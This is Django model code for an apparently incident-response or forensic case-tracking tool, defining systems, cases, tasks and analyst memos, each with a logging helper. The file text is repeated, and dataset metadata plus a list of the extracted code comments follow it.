empty. So the default string is set to 'None'. If there are existing entities, their strings will be used instead and concatenated and separated by comma. """ # get objects ips = system.ip.all() # create empty list iplist = [] # set default string if there is no object at all ipstring = 'None' # iterate over objects for ip in ips: # append object to list iplist.append(ip.ip_ip) # join list to comma separated string if there are any objects, else default string will remain ipstring = ','.join(iplist) if system.system_install_time != None: # cast datetime object to string installtime = system.system_install_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string installtime = 'None' if system.system_lastbooted_time != None: # cast datetime object to string lastbootedtime = system.system_lastbooted_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string lastbootedtime = 'None' if system.system_deprecated_time != None: # cast datetime object to string deprecatedtime = system.system_deprecated_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string deprecatedtime = 'None' # get objects companys = system.company.all() # create empty list companylist = [] # set default string if there is no object at all companystring = 'None' # iterate over objects for company in companys: # append object to list companylist.append(company.company_name) # join list to comma separated string if there are any objects, else default string will remain companystring = ','.join(companylist) # get objects tags = system.tag.all() # create empty list taglist = [] # set default string if there is no object at all tagstring = 'None' # iterate over objects for tag in tags: # append object to list taglist.append(tag.tag_name) # join list to comma separated string if there are any objects, else default string will remain tagstring = ','.join(taglist) # get objects cases = system.case.all() # create empty list caselist = [] # set default string if there is no object at all casestring = 'None' # iterate over objects for case in cases: # append object to list caselist.append(case.case_name) # join list to comma separated string if there are any objects, else default string will remain casestring = ','.join(caselist) # finally write log stdlogger.info( request_user + log_text + " system_id:" + str(system.system_id) + "|system_uuid:" + str(system.system_uuid) + "|system_name:" + str(system) + "|systemstatus:" + str(system.systemstatus) + "|analyisstatus:" + str(system.analysisstatus) + "|reason:" + str(system.reason) + "|recommendation:" + str(system.recommendation) + "|systemtype:" + str(system.systemtype) + "|ip:" + ipstring + "|domain:" + str(system.domain) + "|system_dnssuffix:" + str(system.system_dnssuffix) + "|os:" + str(system.os) + "|osarch:" + str(system.osarch) + "|system_install_time:" + installtime + "|system_lastbooted_time:" + lastbootedtime + "|system_deprecated_time:" + deprecatedtime + "|system_is_vm:" + str(system.system_is_vm) + "|host_system:" + str(system.host_system) + "|company:" + companystring + "|location:" + str(system.location) + "|serviceprovider:" + str(system.serviceprovider) + "|contact:" + str(system.contact) + "|tag:" + tagstring + "|case:" + casestring ) class Systemstatus(models.Model): # primary key systemstatus_id = models.AutoField(primary_key=True) # main entity information systemstatus_name = models.CharField(max_length=30, unique=True) systemstatus_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.systemstatus_name # define logger def logger(systemstatus, request_user, log_text): stdlogger.info( request_user + log_text + " systemstatus_id:" + str(systemstatus.systemstatus_id) + "|systemstatus_name:" + str(systemstatus.systemstatus_name) + "|systemstatus_note:" + str(systemstatus.systemstatus_note) ) class Systemtype(models.Model): # primary key systemtype_id = models.AutoField(primary_key=True) # main entity information systemtype_name = models.CharField(max_length=50, unique=True) # string representation def __str__(self): return self.systemtype_name # define logger def logger(systemtype, request_user, log_text): stdlogger.info( request_user + log_text + " systemtype_id:" + str(systemtype.systemtype_id) + "|systemtype_name:" + str(systemtype.systemtype_name) ) class Systemuser(models.Model): # primary key systemuser_id = models.AutoField(primary_key=True) # foreign key(s) system = models.ForeignKey('System', on_delete=models.CASCADE) # main entity information systemuser_name = models.CharField(max_length=50) systemuser_lastlogon_time = models.DateTimeField(blank=True, null=True) # define unique together class Meta: unique_together = ('system', 'systemuser_name') # string representation def __str__(self): return '%s (%s)' % (self.systemuser_name, self.system) # define logger def logger(systemuser, request_user, log_text): stdlogger.info( request_user + log_text + " systemuser_id:" + str(systemuser.systemuser_id) + "|system:" + str(systemuser.system) + "|systemuser_name:" + str(systemuser.systemuser_name) + "|systemuser_lastlogon_time:" + str(systemuser.systemuser_lastlogon_time) ) class Tag(models.Model): # primary key tag_id = models.AutoField(primary_key=True) # foreign key(s) tagcolor = models.ForeignKey('Tagcolor', on_delete=models.PROTECT) # main entity information tag_name = models.CharField(max_length=50, unique=True) tag_note = models.TextField(blank=True, null=True) # meta information tag_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='tag_modified_by', blank=True, null=True) # string representation def __str__(self): return self.tag_name # define logger def logger(tag, request_user, log_text): stdlogger.info( request_user + log_text + " tag_id:" + str(tag.tag_id) + "|tag_name:" + str(tag.tag_name) + "|tag_note:" + str(tag.tag_note) + "|tagcolor:" + str(tag.tagcolor) ) class Tagcolor(models.Model): # primary key tagcolor_id = models.AutoField(primary_key=True) # main entity information tagcolor_name = models.CharField(max_length=20, unique=True) # string representation def __str__(self): return self.tagcolor_name # define logger def logger(tagcolor, request_user, log_text): stdlogger.info( request_user + log_text + " tagcolor_id:" + str(tagcolor.tagcolor_id) + "|tagcolor_name:" + str(tagcolor.tagcolor_name) ) class Task(models.Model): # primary key task_id = models.AutoField(primary_key=True) # foreign key(s) parent_task = models.ForeignKey('self', on_delete=models.PROTECT, blank=True, null=True) taskname = models.ForeignKey('Taskname', on_delete=models.PROTECT) taskpriority = models.ForeignKey('Taskpriority', on_delete=models.PROTECT) taskstatus = models.ForeignKey('Taskstatus', on_delete=models.PROTECT) system = models.ForeignKey('System', on_delete=models.CASCADE, blank=True, null=True) task_assigned_to_user_id = models.ForeignKey(User, on_delete=models.PROTECT, blank=True, null=True, related_name='task_assigned_to') tag = models.ManyToManyField('Tag', blank=True) # main entity information task_note = models.TextField(blank=True, null=True) task_scheduled_time = models.DateTimeField(blank=True, null=True) task_started_time = models.DateTimeField(blank=True, null=True) task_finished_time = models.DateTimeField(blank=True, null=True) task_due_time = models.DateTimeField(blank=True, null=True) # meta information task_create_time = models.DateTimeField(auto_now_add=True) task_modify_time = models.DateTimeField(auto_now=True) task_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='task_created_by') task_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='task_modified_by') # string representation def __str__(self): return '[%s] %s (%s)' % (self.task_id, self.taskname, self.system) # define logger def logger(task, request_user, log_text): if task.task_scheduled_time != None: # cast datetime object to string scheduledtime = task.task_scheduled_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string scheduledtime = 'None' if task.task_started_time != None: # cast datetime object to string startedtime = task.task_started_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string startedtime = 'None' if task.task_finished_time != None: # cast datetime object to string finishedtime = task.task_finished_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string finishedtime = 'None' if task.task_due_time != None: # cast datetime object to string duetime = task.task_due_time.strftime('%Y-%m-%d %H:%M:%S') # else set default string else: duetime = 'None' # get objects tags = task.tag.all() # create empty list taglist = [] # set default string if there is no object at all tagstring = 'None' # iterate over objects for tag in tags: # append object to list taglist.append(tag.tag_name) # join list to comma separated string if there are any objects, else default string will remain tagstring = ','.join(taglist) # finally write log stdlogger.info( request_user + log_text + " task_id:" + str(task.task_id) + "|parent_task:" + str(task.parent_task) + "|taskname:" + str(task.taskname) + "|taskpriority:" + str(task.taskpriority) + "|taskstatus:" + str(task.taskstatus) + "|system:" + str(task.system) + "|task_assigned_to_user_id:" + str(task.task_assigned_to_user_id) + "|task_note:" + str(task.task_note) + "|task_scheduled_time:" + scheduledtime + "|task_started_time:" + startedtime + "|task_finished_time:" + finishedtime + "|task_due_time:" + duetime + "|tag:" + tagstring ) class Taskname(models.Model): # primary key taskname_id = models.AutoField(primary_key=True) # main entity information taskname_name = models.CharField(max_length=50, unique=True) # string representation def __str__(self): return self.taskname_name # define logger def logger(taskname, request_user, log_text): stdlogger.info( request_user + log_text + " taskname_id:" + str(taskname.taskname_id) + "|taskname_name:" + str(taskname.taskname_name) ) class Taskpriority(models.Model): # primary key taskpriority_id = models.AutoField(primary_key=True) # main entity information taskpriority_name = models.CharField(max_length=6, unique=True) # string representation def __str__(self): return self.taskpriority_name # define logger def logger(taskpriority, request_user, log_text): stdlogger.info( request_user + log_text + " taskpriority_id:" + str(taskpriority.taskpriority_id) + "|taskpriority_name:" + str(taskpriority.taskpriority_name) ) class Taskstatus(models.Model): # primary key taskstatus_id = models.AutoField(primary_key=True) # main entity information taskstatus_name = models.CharField(max_length=50, unique=True) # string representation def __str__(self): return self.taskstatus_name # define logger def logger(taskstatus, request_user, log_text): stdlogger.info( request_user + log_text + " taskstatus_id:" + str(taskstatus.taskstatus_id) + "|taskstatus_name:" + str(taskstatus.taskstatus_name) )
from django.contrib.auth.models import User from django.db import models import logging from time import strftime # initialize logger stdlogger = logging.getLogger(__name__) class Analysisstatus(models.Model): # primary key analysisstatus_id = models.AutoField(primary_key=True) # main entity information analysisstatus_name = models.CharField(max_length=30, unique=True) analysisstatus_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.analysisstatus_name # define logger def logger(analysisstatus, request_user, log_text): stdlogger.info( request_user + log_text + " analysisstatus_id:" + str(analysisstatus.analysisstatus_id) + "|analysisstatus_name:" + str(analysisstatus.analysisstatus_name) + "|analysisstatus_note:" + str(analysisstatus.analysisstatus_note) ) class Analystmemo(models.Model): # primary key analystmemo_id = models.AutoField(primary_key=True) # foreign key(s) system = models.ForeignKey('System', on_delete=models.CASCADE) # main entity information analystmemo_note = models.TextField() # meta information analystmemo_create_time = models.DateTimeField(auto_now_add=True) analystmemo_modify_time = models.DateTimeField(auto_now=True) analystmemo_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='analystmemo_created_by') analystmemo_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='analystmemo_modified_by') # string representation def __str__(self): return 'Analystmemo %s (%s)' % (str(self.analystmemo_id), self.system) # define logger def logger(analystmemo, request_user, log_text): stdlogger.info( request_user + log_text + " analystmemo_id:" + str(analystmemo.analystmemo_id) + "|system:" + str(analystmemo.system) + "|analystmemo_note:" + str(analystmemo.analystmemo_note) ) class Case(models.Model): # primary key case_id = models.AutoField(primary_key=True) # main entity information case_name = models.CharField(max_length=50, unique=True) case_is_incident = models.BooleanField() # meta information case_create_time = models.DateTimeField(auto_now_add=True) case_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='case_created_by') # string representation def __str__(self): return self.case_name # define logger def logger(case, request_user, log_text): stdlogger.info( request_user + log_text + " case_id:" + str(case.case_id) + "|case_name:" + str(case.case_name) + "|case_is_incident:" + str(case.case_is_incident) ) class Company(models.Model): # primary key company_id = models.AutoField(primary_key=True) # foreign key(s) division = models.ForeignKey('Division', on_delete=models.SET_NULL, blank=True, null=True) # main entity information company_name = models.CharField(max_length=50, unique=True) company_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.company_name # define logger def logger(company, request_user, log_text): stdlogger.info( request_user + log_text + " company_id:" + str(company.company_id) + "|division:" + str(company.division) + "|company_name:" + str(company.company_name) + "|company_note:" + str(company.company_note) ) class Contact(models.Model): # primary key contact_id = models.AutoField(primary_key=True) # main entity information contact_name = models.CharField(max_length=100) contact_phone = models.CharField(max_length=50, blank=True, null=True) contact_email = models.CharField(max_length=100, unique=True) contact_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.contact_name # define logger def logger(contact, request_user, log_text): stdlogger.info( request_user + log_text + " contact_id:" + str(contact.contact_id) + "|contact_name:" + str(contact.contact_name) + "|contact_phone:" + str(contact.contact_phone) + "|contact_email:" + str(contact.contact_email) + "|contact_note:" + str(contact.contact_note) ) class Division(models.Model): # primary key division_id = models.AutoField(primary_key=True) # main entity information division_name = models.CharField(max_length=50, unique=True) division_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.division_name # define logger def logger(division, request_user, log_text): stdlogger.info( request_user + log_text + " division_id:" + str(division.division_id) + "|division_name:" + str(division.division_name) + "|division_note:" + str(division.division_note) ) class Domain(models.Model): # primary key domain_id = models.AutoField(primary_key=True) # main entity information domain_name = models.CharField(max_length=100, unique=True) domain_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.domain_name # define logger def logger(domain, request_user, log_text): stdlogger.info( request_user + log_text + " domain_id:" + str(domain.domain_id) + "|domain_name:" + str(domain.domain_name) + "|domain_note:" + str(domain.domain_note) ) class Entry(models.Model): # primary key entry_id = models.AutoField(primary_key=True) # foreign key(s) system = models.ForeignKey('System', on_delete=models.CASCADE) case = models.ForeignKey('Case', on_delete=models.SET_NULL, blank=True, null=True) # main entity information entry_time = models.DateTimeField() entry_sha1 = models.CharField(max_length=40, blank=True, null=True) entry_date = models.CharField(max_length=10, blank=True, null=True) entry_utc = models.CharField(max_length=8, blank=True, null=True) entry_system = models.CharField(max_length=30, blank=True, null=True) entry_type = models.CharField(max_length=30, blank=True, null=True) entry_content = models.TextField(blank=True, null=True) entry_note = models.TextField(blank=True, null=True) # meta information entry_create_time = models.DateTimeField(auto_now_add=True) entry_modify_time = models.DateTimeField(auto_now=True) entry_api_time = models.DateTimeField(null=True) entry_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='entry_created_by') entry_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='entry_modified_by') # define unique together class Meta: unique_together = ('system', 'entry_sha1') # string representation def __str__(self): return '%s | %s | %s' % (str(self.entry_id), self.system, self.entry_sha1) # define logger def logger(entry, request_user, log_text): stdlogger.info( request_user + log_text + " entry_id:" + str(entry.entry_id) + "|system:" + str(entry.system) + "|entry_sha1:" + str(entry.entry_sha1) + "|entry_note:" + str(entry.entry_note) + "|case:" + str(entry.case) ) class Headline(models.Model): # primary key headline_id = models.AutoField(primary_key=True) # main entity information headline_name = models.CharField(max_length=100, unique=True) # string representation def __str__(self): return self.headline_name # define logger def logger(headline, request_user, log_text): stdlogger.info( request_user + log_text + " headline_id:" + str(headline.headline_id) + "|headline_name:" + str(headline.headline_name) ) class Ip(models.Model): # primary key ip_id = models.AutoField(primary_key=True) # main entity information ip_ip = models.GenericIPAddressField(unique=True) # string representation def __str__(self): return self.ip_ip # define logger def logger(ip, request_user, log_text): stdlogger.info( request_user + log_text + " ip_id:" + str(ip.ip_id) + "|ip_ip:" + str(ip.ip_ip) ) class Location(models.Model): # primary key location_id = models.AutoField(primary_key=True) # main entity information location_name = models.CharField(max_length=50, unique=True) location_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.location_name # define logger def logger(location, request_user, log_text): stdlogger.info( request_user + log_text + " location_id:" + str(location.location_id) + "|location_name:" + str(location.location_name) + "|location_note:" + str(location.location_note) ) class Os(models.Model): # primary key os_id = models.AutoField(primary_key=True) # main entity information os_name = models.CharField(max_length=30, unique=True) # string representation def __str__(self): return self.os_name # define logger def logger(os, request_user, log_text): stdlogger.info( request_user + log_text + " os_id:" + str(os.os_id) + "|os_name:" + str(os.os_name) ) class Osarch(models.Model): # primary key osarch_id = models.AutoField(primary_key=True) # main entity information osarch_name = models.CharField(max_length=10, unique=True) # string representation def __str__(self): return self.osarch_name # define logger def logger(osarch, request_user, log_text): stdlogger.info( request_user + log_text + " osarch_id:" + str(osarch.osarch_id) + "|osarch_name:" + str(osarch.osarch_name) ) class Osimportname(models.Model): # primary key osimportname_id = models.AutoField(primary_key=True) # foreign key(s) os = models.ForeignKey('Os', on_delete=models.CASCADE) # main entity information osimportname_name = models.CharField(max_length=30, unique=True) osimportname_importer = models.CharField(max_length=30) # string representation def __str__(self): return '%s (%s)' % (self.osimportname_name, self.os) # define logger def logger(osimportname, request_user, log_text): stdlogger.info( request_user + log_text + " osimportname_id:" + str(osimportname.osimportname_id) + "|osimportname_name:" + str(osimportname.osimportname_name) + "|osimportname_importer:" + str(osimportname.osimportname_importer) + "|os:" + str(osimportname.os) ) class Reason(models.Model): # primary key reason_id = models.AutoField(primary_key=True) # main entity information reason_name = models.CharField(max_length=30, unique=True) reason_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.reason_name # define logger def logger(reason, request_user, log_text): stdlogger.info( request_user + log_text + " reason_id:" + str(reason.reason_id) + "|reason_name:" + str(reason.reason_name) + "|reason_note:" + str(reason.reason_note) ) class Recommendation(models.Model): # primary key recommendation_id = models.AutoField(primary_key=True) # main entity information recommendation_name = models.CharField(max_length=30, unique=True) recommendation_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.recommendation_name # define logger def logger(recommendation, request_user, log_text): stdlogger.info( request_user + log_text + " recommendation_id:" + str(recommendation.recommendation_id) + "|recommendation_name:" + str(recommendation.recommendation_name) + "|recommendation_note:" + str(recommendation.recommendation_note) ) class Reportitem(models.Model): # primary key reportitem_id = models.AutoField(primary_key=True) # foreign key(s) system = models.ForeignKey('System', on_delete=models.CASCADE) headline = models.ForeignKey('Headline', on_delete=models.PROTECT) # main entity information reportitem_subheadline = models.CharField(max_length=100, blank=True, null=True) reportitem_note = models.TextField() # meta information reportitem_create_time = models.DateTimeField(auto_now_add=True) reportitem_modify_time = models.DateTimeField(auto_now=True) reportitem_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='reportitem_created_by') reportitem_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='reportitem_modified_by') # define unique together class Meta: unique_together = (('system', 'headline', 'reportitem_subheadline'),) # string representation def __str__(self): return '%s | %s | %s' % (self.system, self.headline.headline_name, self.reportitem_subheadline) # define logger def logger(reportitem, request_user, log_text): stdlogger.info( request_user + log_text + " reportitem_id:" + str(reportitem.reportitem_id) + "|system:" + str(reportitem.system) + "|headline:" + str(reportitem.headline) + "|reportitem_subheadline:" + str(reportitem.reportitem_subheadline) + "|reportitem_note:" + str(reportitem.reportitem_note) ) class Serviceprovider(models.Model): # primary key serviceprovider_id = models.AutoField(primary_key=True) # main entity information serviceprovider_name = models.CharField(max_length=50, unique=True) serviceprovider_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.serviceprovider_name # define logger def logger(serviceprovider, request_user, log_text): stdlogger.info( request_user + log_text + " serviceprovider_id:" + str(serviceprovider.serviceprovider_id) + "|serviceprovider_name:" + str(serviceprovider.serviceprovider_name) + "|serviceprovider_note:" + str(serviceprovider.serviceprovider_note) ) class System(models.Model): # primary key system_id = models.AutoField(primary_key=True) # foreign key(s) systemstatus = models.ForeignKey('Systemstatus', on_delete=models.PROTECT) analysisstatus = models.ForeignKey('Analysisstatus', on_delete=models.PROTECT, blank=True, null=True) reason = models.ForeignKey('Reason', on_delete=models.PROTECT, blank=True, null=True) recommendation = models.ForeignKey('Recommendation', on_delete=models.PROTECT, blank=True, null=True) systemtype = models.ForeignKey('Systemtype', on_delete=models.PROTECT, blank=True, null=True) ip = models.ManyToManyField('Ip', blank=True) domain = models.ForeignKey('Domain', on_delete=models.PROTECT, blank=True, null=True) os = models.ForeignKey('Os', on_delete=models.PROTECT, blank=True, null=True) osarch = models.ForeignKey('Osarch', on_delete=models.PROTECT, blank=True, null=True) host_system = models.ForeignKey('self', on_delete=models.PROTECT, blank=True, null=True) company = models.ManyToManyField('Company', blank=True) location = models.ForeignKey('Location', on_delete=models.PROTECT, blank=True, null=True) serviceprovider = models.ForeignKey('Serviceprovider', on_delete=models.PROTECT, blank=True, null=True) contact = models.ForeignKey('Contact', on_delete=models.PROTECT, blank=True, null=True) tag = models.ManyToManyField('Tag', blank=True) case = models.ManyToManyField('Case', blank=True) # main entity information system_uuid = models.UUIDField(editable=False, null=True, unique=True) system_name = models.CharField(max_length=50) system_dnssuffix = models.CharField(max_length=50, blank=True, null=True) system_install_time = models.DateTimeField(blank=True, null=True) system_lastbooted_time = models.DateTimeField(blank=True, null=True) system_deprecated_time = models.DateTimeField(blank=True, null=True) system_is_vm = models.NullBooleanField(blank=True, null=True) # meta information system_create_time = models.DateTimeField(auto_now_add=True) system_modify_time = models.DateTimeField() system_api_time = models.DateTimeField(null=True) system_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='system_created_by') system_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='system_modified_by') # define unique together class Meta: unique_together = ('system_name', 'domain', 'system_install_time') # string representation def __str__(self): if self.system_install_time == None: return '[%s] %s' % (str(self.system_id), self.system_name) else: installtime = self.system_install_time.strftime('%Y-%m-%d') return '[%s] %s (%s)' % (str(self.system_id), self.system_name, installtime) # define logger def logger(system, request_user, log_text): """ ManyToMany-Relationsship don't get the default 'None' string if they are empty. So the default string is set to 'None'. If there are existing entities, their strings will be used instead and concatenated and separated by comma. """ # get objects ips = system.ip.all() # create empty list iplist = [] # set default string if there is no object at all ipstring = 'None' # iterate over objects for ip in ips: # append object to list iplist.append(ip.ip_ip) # join list to comma separated string if there are any objects, else default string will remain ipstring = ','.join(iplist) if system.system_install_time != None: # cast datetime object to string installtime = system.system_install_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string installtime = 'None' if system.system_lastbooted_time != None: # cast datetime object to string lastbootedtime = system.system_lastbooted_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string lastbootedtime = 'None' if system.system_deprecated_time != None: # cast datetime object to string deprecatedtime = system.system_deprecated_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string deprecatedtime = 'None' # get objects companys = system.company.all() # create empty list companylist = [] # set default string if there is no object at all companystring = 'None' # iterate over objects for company in companys: # append object to list companylist.append(company.company_name) # join list to comma separated string if there are any objects, else default string will remain companystring = ','.join(companylist) # get objects tags = system.tag.all() # create empty list taglist = [] # set default string if there is no object at all tagstring = 'None' # iterate over objects for tag in tags: # append object to list taglist.append(tag.tag_name) # join list to comma separated string if there are any objects, else default string will remain tagstring = ','.join(taglist) # get objects cases = system.case.all() # create empty list caselist = [] # set default string if there is no object at all casestring = 'None' # iterate over objects for case in cases: # append object to list caselist.append(case.case_name) # join list to comma separated string if there are any objects, else default string will remain casestring = ','.join(caselist) # finally write log stdlogger.info( request_user + log_text + " system_id:" + str(system.system_id) + "|system_uuid:" + str(system.system_uuid) + "|system_name:" + str(system) + "|systemstatus:" + str(system.systemstatus) + "|analyisstatus:" + str(system.analysisstatus) + "|reason:" + str(system.reason) + "|recommendation:" + str(system.recommendation) + "|systemtype:" + str(system.systemtype) + "|ip:" + ipstring + "|domain:" + str(system.domain) + "|system_dnssuffix:" + str(system.system_dnssuffix) + "|os:" + str(system.os) + "|osarch:" + str(system.osarch) + "|system_install_time:" + installtime + "|system_lastbooted_time:" + lastbootedtime + "|system_deprecated_time:" + deprecatedtime + "|system_is_vm:" + str(system.system_is_vm) + "|host_system:" + str(system.host_system) + "|company:" + companystring + "|location:" + str(system.location) + "|serviceprovider:" + str(system.serviceprovider) + "|contact:" + str(system.contact) + "|tag:" + tagstring + "|case:" + casestring ) class Systemstatus(models.Model): # primary key systemstatus_id = models.AutoField(primary_key=True) # main entity information systemstatus_name = models.CharField(max_length=30, unique=True) systemstatus_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.systemstatus_name # define logger def logger(systemstatus, request_user, log_text): stdlogger.info( request_user + log_text + " systemstatus_id:" + str(systemstatus.systemstatus_id) + "|systemstatus_name:" + str(systemstatus.systemstatus_name) + "|systemstatus_note:" + str(systemstatus.systemstatus_note) ) class Systemtype(models.Model): # primary key systemtype_id = models.AutoField(primary_key=True) # main entity information systemtype_name = models.CharField(max_length=50, unique=True) # string representation def __str__(self): return self.systemtype_name # define logger def logger(systemtype, request_user, log_text): stdlogger.info( request_user + log_text + " systemtype_id:" + str(systemtype.systemtype_id) + "|systemtype_name:" + str(systemtype.systemtype_name) ) class Systemuser(models.Model): # primary key systemuser_id = models.AutoField(primary_key=True) # foreign key(s) system = models.ForeignKey('System', on_delete=models.CASCADE) # main entity information systemuser_name = models.CharField(max_length=50) systemuser_lastlogon_time = models.DateTimeField(blank=True, null=True) # define unique together class Meta: unique_together = ('system', 'systemuser_name') # string representation def __str__(self): return '%s (%s)' % (self.systemuser_name, self.system) # define logger def logger(systemuser, request_user, log_text): stdlogger.info( request_user + log_text + " systemuser_id:" + str(systemuser.systemuser_id) + "|system:" + str(systemuser.system) + "|systemuser_name:" + str(systemuser.systemuser_name) + "|systemuser_lastlogon_time:" + str(systemuser.systemuser_lastlogon_time) ) class Tag(models.Model): # primary key tag_id = models.AutoField(primary_key=True) # foreign key(s) tagcolor = models.ForeignKey('Tagcolor', on_delete=models.PROTECT) # main entity information tag_name = models.CharField(max_length=50, unique=True) tag_note = models.TextField(blank=True, null=True) # meta information tag_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='tag_modified_by', blank=True, null=True) # string representation def __str__(self): return self.tag_name # define logger def logger(tag, request_user, log_text): stdlogger.info( request_user + log_text + " tag_id:" + str(tag.tag_id) + "|tag_name:" + str(tag.tag_name) + "|tag_note:" + str(tag.tag_note) + "|tagcolor:" + str(tag.tagcolor) ) class Tagcolor(models.Model): # primary key tagcolor_id = models.AutoField(primary_key=True) # main entity information tagcolor_name = models.CharField(max_length=20, unique=True) # string representation def __str__(self): return self.tagcolor_name # define logger def logger(tagcolor, request_user, log_text): stdlogger.info( request_user + log_text + " tagcolor_id:" + str(tagcolor.tagcolor_id) + "|tagcolor_name:" + str(tagcolor.tagcolor_name) ) class Task(models.Model): # primary key task_id = models.AutoField(primary_key=True) # foreign key(s) parent_task = models.ForeignKey('self', on_delete=models.PROTECT, blank=True, null=True) taskname = models.ForeignKey('Taskname', on_delete=models.PROTECT) taskpriority = models.ForeignKey('Taskpriority', on_delete=models.PROTECT) taskstatus = models.ForeignKey('Taskstatus', on_delete=models.PROTECT) system = models.ForeignKey('System', on_delete=models.CASCADE, blank=True, null=True) task_assigned_to_user_id = models.ForeignKey(User, on_delete=models.PROTECT, blank=True, null=True, related_name='task_assigned_to') tag = models.ManyToManyField('Tag', blank=True) # main entity information task_note = models.TextField(blank=True, null=True) task_scheduled_time = models.DateTimeField(blank=True, null=True) task_started_time = models.DateTimeField(blank=True, null=True) task_finished_time = models.DateTimeField(blank=True, null=True) task_due_time = models.DateTimeField(blank=True, null=True) # meta information task_create_time = models.DateTimeField(auto_now_add=True) task_modify_time = models.DateTimeField(auto_now=True) task_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='task_created_by') task_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='task_modified_by') # string representation def __str__(self): return '[%s] %s (%s)' % (self.task_id, self.taskname, self.system) # define logger def logger(task, request_user, log_text): if task.task_scheduled_time != None: # cast datetime object to string scheduledtime = task.task_scheduled_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string scheduledtime = 'None' if task.task_started_time != None: # cast datetime object to string startedtime = task.task_started_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string startedtime = 'None' if task.task_finished_time != None: # cast datetime object to string finishedtime = task.task_finished_time.strftime('%Y-%m-%d %H:%M:%S') else: # else set default string finishedtime = 'None' if task.task_due_time != None: # cast datetime object to string duetime = task.task_due_time.strftime('%Y-%m-%d %H:%M:%S') # else set default string else: duetime = 'None' # get objects tags = task.tag.all() # create empty list taglist = [] # set default string if there is no object at all tagstring = 'None' # iterate over objects for tag in tags: # append object to list taglist.append(tag.tag_name) # join list to comma separated string if there are any objects, else default string will remain tagstring = ','.join(taglist) # finally write log stdlogger.info( request_user + log_text + " task_id:" + str(task.task_id) + "|parent_task:" + str(task.parent_task) + "|taskname:" + str(task.taskname) + "|taskpriority:" + str(task.taskpriority) + "|taskstatus:" + str(task.taskstatus) + "|system:" + str(task.system) + "|task_assigned_to_user_id:" + str(task.task_assigned_to_user_id) + "|task_note:" + str(task.task_note) + "|task_scheduled_time:" + scheduledtime + "|task_started_time:" + startedtime + "|task_finished_time:" + finishedtime + "|task_due_time:" + duetime + "|tag:" + tagstring ) class Taskname(models.Model): # primary key taskname_id = models.AutoField(primary_key=True) # main entity information taskname_name = models.CharField(max_length=50, unique=True) # string representation def __str__(self): return self.taskname_name # define logger def logger(taskname, request_user, log_text): stdlogger.info( request_user + log_text + " taskname_id:" + str(taskname.taskname_id) + "|taskname_name:" + str(taskname.taskname_name) ) class Taskpriority(models.Model): # primary key taskpriority_id = models.AutoField(primary_key=True) # main entity information taskpriority_name = models.CharField(max_length=6, unique=True) # string representation def __str__(self): return self.taskpriority_name # define logger def logger(taskpriority, request_user, log_text): stdlogger.info( request_user + log_text + " taskpriority_id:" + str(taskpriority.taskpriority_id) + "|taskpriority_name:" + str(taskpriority.taskpriority_name) ) class Taskstatus(models.Model): # primary key taskstatus_id = models.AutoField(primary_key=True) # main entity information taskstatus_name = models.CharField(max_length=50, unique=True) # string representation def __str__(self): return self.taskstatus_name # define logger def logger(taskstatus, request_user, log_text): stdlogger.info( request_user + log_text + " taskstatus_id:" + str(taskstatus.taskstatus_id) + "|taskstatus_name:" + str(taskstatus.taskstatus_name) )
en
0.482766
# initialize logger # primary key # main entity information # string representation # define logger # primary key # foreign key(s) # main entity information # meta information # string representation # define logger # primary key # main entity information # meta information # string representation # define logger # primary key # foreign key(s) # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # foreign key(s) # main entity information # meta information # define unique together # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # foreign key(s) # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # foreign key(s) # main entity information # meta information # define unique together # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # foreign key(s) # main entity information # meta information # define unique together # string representation # define logger ManyToMany-Relationsship don't get the default 'None' string if they are empty. So the default string is set to 'None'. If there are existing entities, their strings will be used instead and concatenated and separated by comma. # get objects # create empty list # set default string if there is no object at all # iterate over objects # append object to list # join list to comma separated string if there are any objects, else default string will remain # cast datetime object to string # else set default string # cast datetime object to string # else set default string # cast datetime object to string # else set default string # get objects # create empty list # 